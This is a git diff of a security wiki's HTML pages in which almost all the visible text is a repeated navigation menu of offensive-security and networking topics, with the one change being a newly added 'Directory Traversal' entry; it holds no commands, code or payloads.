Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html b/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html index 98cb680b..165e2dbe 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Bypassing UAC.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -189,22 +189,6 @@

Bypassing UAC - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html b/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html index 3d8d49dc..190cf504 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Kernel Exploits.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -178,22 +178,6 @@

Introduction - - diff --git a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html index a129c60e..a1f61d8b 100644 --- a/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html +++ b/docs/Post Exploitation/Privilege Escalation/Windows/Misconfigured Services/Insecure Service Executable Permissions.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
